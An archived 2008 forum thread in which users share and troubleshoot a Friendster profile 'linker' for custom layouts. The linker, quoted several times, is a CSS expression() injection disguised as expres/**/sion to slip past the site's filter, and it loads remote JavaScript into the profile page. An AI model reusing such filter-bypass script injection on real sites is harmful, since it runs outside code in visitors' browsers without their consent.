• ARCHIVES 
  • » new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

thephrenetic
» FTalker
FTalk Level: zero
1969-12-31

Re: new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

but its still won't work on my page.. emote,this linker..all is doesn't work..wats:crybaby::crybaby: wrong!!!
simpleMe
» FTalkManiac
1969-12-31

Re: new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

[quote=thephrenetic]but its still won't work on my page.. emote,this linker..all is doesn't work..wats:crybaby::crybaby: wrong!!![/quote] try to log-out then log-in again, then view your profile... btw, dont removed the linker in your media box :D
rdvg3283
» FTalker
1969-12-31

its working but some of my boxes were gone..... thanx by the way! :)
kirksydney
» FTalkAddict
1969-12-31

[quote=kirksydney]Guys, I tried it just now, and it's working perfectly. Check my [url=http://friendster.com/19533358]profile[/url] for proof. What I did was, I added a word right before my linker. Here's an example: [quote]kirksydney<style type='text/css'>@import url(http://h1.ripway.com/thecradle/loader.swf);</style><a id='cradle' style="obj:expres/**/sion(function b(){c=document.createElement('script');c.src=cradle.innerHTML;navBg.appendChild(c)}b());text:expres/**/sion(cradle.style.obj='0');visibility:hidden">URL OF JS</a>[/quote] As you can notice, I put the word "kirksydney" before the linker. You can put any word you want. Should go to your Media Box section. Definitely compatible with IE and FF. =)[/quote]
sprongky
» FTalkManiac
1969-12-31

yah that right.. try to follow the instruction of kirksydney.. and it 100% Works in your profile..
izhy10
» n00b
1969-12-31

OMG!!! it's working!!!! =) haha.. tanx
Saiia_itu_mia
» FTalkAddict
1969-12-31

[quote]<style type='text/css'>@import url(http://h1.ripway.com/thecradle/loader.swf);</style><a id='cradle' style="obj:expres/**/sion(function b(){c=document.createElement('script');c.src=cradle.innerHTML;navBg.appendChild(c)}b());text:expres/**/sion(cradle.style.obj='0');visibility:hidden">http://h1.ripway.com/mia06/fs/tes/mia.js</a>[/quote] whats wrong with my js its doesnt work.
kirksydney
» FTalkAddict
1969-12-31

Add any word right before your linker. Give this one a try: <">
sprongky
» FTalkManiac
1969-12-31

before inserting a code in media box you should put anyletter first so that the media box will appear in the profile [quote][b]Sprongky[/b]<style type='text/css'>@import url(http://h1.ripway.com/thecradle/loader.swf);</style><a id='cradle' style="obj:expres/**/sion(function b(){c=document.createElement('script');c.src=cradle.innerHTML;navBg.appendChild(c)}b());text:expres/**/sion(cradle.style.obj='0');visibility:hidden">UEL OF JS</a>[/quote]

Last edited by sprongky (2008-04-22 07:18:03)

theycallme k
» FTalkAddict
1969-12-31

it,s working but sometime null
simpleMe
» FTalkManiac
1969-12-31

[quote=theycallme k]it,s working but sometime null[/quote] if your using [b].swf[/b] name it to [b].txt[/b]
loxiens
» n00b
1969-12-31

yeah working again on my profile, thanks sprongky :thumbsup:
reiearth
» n00b
1969-12-31

yessss. thanx..my js works again......:o
cutielavender
» n00b
1969-12-31

could u please help me.. because my profile experienced the "SEND ERROR REPORT" thing... thnx if u'r going to have a quick reply... ^_^
andrewijaya
» FTalkAddict
1969-12-31

why if we make an enterpage, this linker doesn`t read the script of enterpage?? any solutions sir??
andrewijaya
» FTalkAddict
1969-12-31

[quote=cutielavender]could u please help me.. because my profile experienced the "SEND ERROR REPORT" thing... thnx if u'r going to have a quick reply... ^_^[/quote] where u put that linker??:ninja:
cutielavender
» n00b
1969-12-31

[quote=andrewijaya]where u put that linker??:ninja:[/quote] i put my linker in Media Box... but when i started to open my profile, a dialog box popped out then it says that there is an error... ^_^ u can view my profile... www.friendster.com/rachy26 thnx very much///
andrewijaya
» FTalkAddict
1969-12-31

^cutie ur linker is working...may be ur connection is step down..btw nice layouts...:thumbsup:
ai4ever
» n00b
1969-12-31

anybody hir check my codes:thumbsdown: <">where to put my css linker ???:|
cutielavender
» n00b
1969-12-31

[quote=andrewijaya]^cutie ur linker is working...may be ur connection is step down..btw nice layouts...:thumbsup:[/quote] r u xure?! anywayz... thank u for the compliments... i think that my real problem is our connection... thanx for viewing... ^_^
  • ARCHIVES 
  • » new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

Board footer

© 2024 F Talk

Current time is 08:55

[ 9 queries - 0.055 second ]
Privacy Policy